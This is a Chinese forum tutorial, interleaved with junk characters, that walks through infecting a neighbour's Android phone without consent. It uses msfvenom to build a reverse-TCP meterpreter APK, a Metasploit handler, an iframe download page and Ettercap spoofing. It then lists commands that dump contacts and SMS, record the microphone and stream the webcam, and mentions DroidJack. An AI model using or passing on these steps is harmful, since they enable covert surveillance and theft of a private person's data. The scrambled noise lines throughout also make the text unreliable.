$ G3 p8 x$ w9 G- Q
五、msf+ettercap入侵邻居安卓手机 5 l+ {, R+ z8 Y6 K7 X2 K
7 N ^& L2 _6 Z/ @
' V8 J, _+ G @0 y1 U( p ?
首先启动msf ) L: e8 I0 W. g3 I0 |
2 I6 C; u& L) e1 T
" ^+ l z3 x1 ?3 [. c+ [
先用kali生成一个安卓木马,如下命令: . |% y2 O6 e# Y; j- o
' X4 k8 Z+ k6 s5 }0 O7 @1 e1 [
3 u& L4 k3 E; K- r2 R; j9 ~- e3 i
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % j P7 |0 N" ?3 L/ J
6 x% `8 ]( v5 z
% o6 U0 u6 A$ g/ ?0 t* T2 S 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ' h) L: e! Z) U0 P2 V6 b% X
2 r1 x2 b' i" _" V# k7 k6 m) ^/ u
7 [7 L6 T$ I( r1 m) R2 v! a: p- X 然后进入msf ; E/ a& t$ m: m- D$ E7 D; p/ Q# }
; W* K$ b. h, q( k& G1 y+ i$ k4 h- k5 y6 x9 y
use exploit/multi/handler
) j) q8 g5 C; h/ } # ?7 C1 |) J2 y& g
0 r) H8 p9 z6 m3 J% |0 m
set payload android/meterpreter/reverse_tcp ) c9 o1 G. V. S( X# t
7 e9 L& y* E1 i) c
, d, E v$ F, L5 {$ Z0 q% e8 t set LHOST 192.168.0.109 //ip为kaili的ip
, p7 J1 y) D1 l6 |" w ; R$ R, l" P* ^: ?7 o
5 x( \9 u/ F! W. ?6 c+ c: Z set LPORT 44444 //端口一定要与前面生成的木马的端口一致 , e' C, d* n5 z8 K1 _9 X
: r4 k6 Z, R' l* U! V) v) N& Y
Exploit 4 z* z2 n* T6 r: o# G( T& V" ]
- T% `. s2 T: k( N3 w ?7 C
7 B; C7 D+ u. t, k
) c z* R: j2 N- L8 g
4 v" d k8 Z8 g8 A. b
* ~7 W/ D3 V, G3 t- A 下面我们开启ettercap -G
# E& m2 X, W) @" O ( s% v" _% b: R/ Z$ _& W
4 V# Y: k! ]1 X% G 我物理IP为 , Z1 Z" \* [: ?4 `' L) B
! p: A) f t, v3 d7 l5 W
% `+ k4 M( X5 i. b( Y
' l8 `- i9 I# ~7 I ~- B {- G
: v0 U6 X# Z$ ~5 q- h1 p' F
' I/ L! V1 p- t! q6 p 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
. F$ W1 X( X2 ?- i1 {6 | . ~) V5 ~3 a4 s) X$ @
0 [/ Y# r% L0 Q 下面我们来设置一下
; I g; e n! Z; \
{* H( ], Z$ |/ j
2 U0 w B: l0 g ?* q3 S! I. ^$ Z / J- [; w8 Q/ q/ g( a+ Y. \( B# z
/ f: }: D* i. D) i' U, W4 @
. r S' l& U% }6 q& {' s
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 s! C+ N# i. Q2 F: h
+ i7 g% b6 s2 {: P+ t, Y9 q
/ E3 r( O# h" a6 _' m8 j
% Z/ i* k& G) J8 j) }: e" k9 G
3 i8 b2 q4 Y* R8 i/ \" x, d! d u5 \1 Q3 V; R8 d4 @9 }! [' Q
- _. _# X9 A+ N7 l 6 r: r. S! f3 |) M0 y% o
0 |5 I# l% Y# }
9 U6 X4 p- k L/ w
+ C) c) l' J! l# K0 J& a8 F D& d
0 ?- k+ g; A1 I" g/ @# H3 t
# ~$ P+ ]4 y0 H; M1 ^
* q, e0 S6 h5 _5 g- k" W
) q, T+ `5 n% t N3 @ 8 }8 J9 q: o Z* ?: K6 m9 C4 z1 V2 x2 O
+ I0 A$ k& X4 U, T! Z# u
j& G" X+ c1 X
6 p- ^6 v: a6 l8 t3 G2 |
: a! K ^. l2 m8 r" q
1 @( O% q+ n4 f9 p
* Z* c4 I/ U( x; D) |# f+ f H/ P+ H
! e+ s+ b6 ^+ K4 \- x
8 u2 i4 \( l }' \6 y
$ j6 J6 C+ _1 H, \" n5 F
0 l8 b5 F* }- H+ i
5 v) P/ _) m2 }: d% i 7 B9 a6 y* K8 r8 C2 _' l
1 Q' O- P- \( a9 z8 B
& h# W% {$ w. `0 b! e( Y B
, b" W5 |% L# x9 v) m. ?" a
9 z& g" e) n- V/ b/ {
! P& O- O& ?6 K* b6 r+ v % }" ` u) [1 u+ U u0 s4 r* e
9 v9 I; b5 ~; Z6 H( p A+ C
9 ^+ ]. d& K8 E! Q
* S/ Q, S: f4 x5 w: V2 O - X. j) L% I; f) x
/ G' X" S; m. V7 r+ }, e
% q [% p% ~3 r I, I1 Q9 z # x' C3 M3 y3 m3 m& d0 D* A
+ J/ |* t1 \& J
下面我们开始攻击 8 W' }5 {& @4 ^7 \* a, N
; R0 s5 |, v$ {5 |" n
1 h# D2 w2 R6 J( R7 ~: ~3 a( i 7 g6 ?& @6 w! e% ]3 ~/ S% D7 A
* `, I, \/ C7 K2 l( d9 u
; X" k. K- Y, _! M, x5 `+ l' w
6 \" J+ q# b1 v& G" J2 }; U! o& t
/ q2 i1 _' ^5 }, s/ @( E
" v* ^) F) x* A3 {4 y
7 c% I5 O; A1 @4 v! m3 F- p. z a ! L/ ^3 w: i0 Q# r5 {$ S- _
, v, r% k' r) ~( d
! f& [: d2 e1 g" d# f
1 Z6 J$ E4 j+ L& u! t) d; h# b# N0 h& F+ {2 ]3 p' q. C$ e
, x8 E( J; A. i1 H1 c
/ _: J7 H4 Z' X3 X: h' |5 a; F+ o0 S4 \# g
大概过了5分钟多,发现反弹成功了 3 @! W3 a3 D/ M2 K
: o0 J% ?5 |3 u
( |3 V- ?& O7 {9 P* f
9 ^9 _) Y7 Q: L) t ! G9 n, j0 x3 m) A" L& D
: y; n" f9 v M- P! {/ j
2 V( w4 Z' X0 z6 |* Q: a
, s2 J2 a- Z! h- i3 o0 A$ \* d" R4 |' s5 k/ c: a/ e' }1 U6 l
/ `3 A4 X" _7 L* A " r O7 k3 H! r7 E4 b
2 o! D& J# I' y9 [3 v
# R! W1 f8 ~9 ]! d; X
5 w0 `/ f4 `6 b# m
$ v# J! ~4 |+ {
" L& B( g$ X2 ]$ r 8 w( d4 p9 u9 u- r7 x5 J% V A
* Z1 o K$ R4 I1 n# A
6 g2 f/ X5 q: _
7 o& N$ \- a" V5 D& ]2 h9 n6 L. r( J( [( E9 O, d$ |- u; a
5 O! s5 n8 M0 m: }/ r$ W) M2 K
: [8 U* j- W* H' e) n5 o+ y) W" n; |: m
执行命令 / U- a7 X8 ]* I: m1 c
7 Y s3 J9 a1 K$ n' `* D" {3 a8 O$ F4 Q3 }4 S# e! ^
: V, U, p. d" ~* A4 O
( a$ X+ U$ S; D+ ^0 [
, |/ F' W: ^1 @6 z dump_contacts --》这个是导出电话
1 V& Q6 C& t% Y; [' O+ z) t! v 7 X: h) D1 u M* } w
9 I1 |/ U" z. n8 y% Y dump_sms --》这个是导出信息 Z: ^* H+ f7 m0 Y
$ k3 c, c/ I( l, @5 t- a
5 i, J" K1 n) L! L* k; W
record_mic Record audio from the default microphone for X seconds , u/ e6 A* x$ x) e
, S$ D$ K, _ x) S0 G3 a
% ` g3 K2 {& ~. `6 G webcam_chat Start a video chat
" z2 u, W* Q: }9 O
U! R9 {" }) E) e( g) Y/ j7 l& o0 B2 Y. Y* `. m( A9 X) \1 D
webcam_list List webcams $ \0 z" H1 H. n/ D9 D! `3 L! k
. @8 q# F1 l# r
7 D! i* I4 \' Y7 G6 q2 |( U
webcam_snap Take a snapshot from the specified webcam
6 R3 m* j4 k! O- t
5 e9 N% F! |+ c4 A/ g; r6 W# Y$ v3 Y- A& n' D( a
webcam_stream  lay a video stream from the specified webcam ( `0 @; |% b# p, h5 z" o
9 M1 t8 p: N, H* U/ E
0 M+ ~* ]& k! |5 a2 V4 I
K/ a i* L+ d8 ` 3 }, S4 g' F% j- e6 d' S; j: i2 D
& w: l5 \# j" f5 q+ q% f; W9 ~
: s3 s9 Q; x' X. S6 q) O9 [
1 r9 x9 W. R0 @2 |3 z9 q' U" i0 J4 k2 g1 _; L. e) U0 u9 |$ I
我们打开看一下电话薄, ! @* S, E+ ` J4 G4 j) C
+ e p2 p. a" D
( [$ S) E5 x$ ]2 \" j/ G9 ^
8 S# |0 `' E, u" \ $ @. Z7 R7 H* Q8 n: }
4 ?/ V# ?5 o( ]: C. C
& R+ \% Z# N% w' d
9 E7 _. O* N5 S0 X3 \. R- {$ C. w0 D
* W: w$ t' `8 }+ A# \5 ]2 O7 s$ t' W
- E; O1 g/ [& ~% Y% Y9 ?* G
0 c+ e" m" g6 [ M 8 ^( ~1 `0 w# z
; e4 L0 L% S: w$ W- c
6 \6 F+ J! X* `' ~* @" ` , U2 S( F, q0 l/ l; j
' \) i; K5 V# b0 z1 w! i0 X/ n
7 V5 k9 q* }: K7 Z( ]0 \8 z
5 g$ v, O- l3 G2 p! Y! x
. V: P( [' Y' N' S7 q
) V5 W" k7 S( g( C; E# j) d 我们同时欺骗成DroidJack木马,使用方法如图:
k% o, Z+ }6 j
/ Y5 L. s' t) b
; U7 Z+ x/ h- S& {( a t) ~- j : x8 j& Y8 ]; ^7 ^3 Z/ u% M% p
) b0 J7 ^' T2 v( W8 e- k
% f4 E! q0 d5 A* B6 N 5 l6 ]9 M7 Z# v+ a6 P
( j. Z" J3 h+ h' X1 V7 m* D
. Q, N7 x3 @5 u$ G
, D/ G- o$ N9 ~" b/ r5 Y" [ 1 M0 A6 ?* {6 N( s; Q
1 Q& a5 I( H& S: q6 P( f0 ?' f& x
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 8 h( h8 R5 W+ ^4 `# n+ Y5 @
6 q/ O D+ f. B7 a$ Z
. m! d" M! _$ R1 O* f
2 G( a' E0 F3 y7 y4 ]+ y ( {4 q) |* p1 d
1 j" t, E+ ~$ u% p
) g* k, _" t$ A3 m' y! V O , H% {5 I" l, F! K4 n" E8 c9 R
' i( o5 G) [* S6 K: U0 Y
' F; K& {0 o5 y2 |
3 S& @/ @' v; @$ X6 q3 _6 I! v: {" h0 [+ ^9 x
) _# V) }" x) u& G6 w5 T3 T
" F( y8 s7 r/ ^' d1 ?: A- L% o" \ C: i- [* ]9 w" P
1 ~2 z7 y# t# a6 k% b1 J
|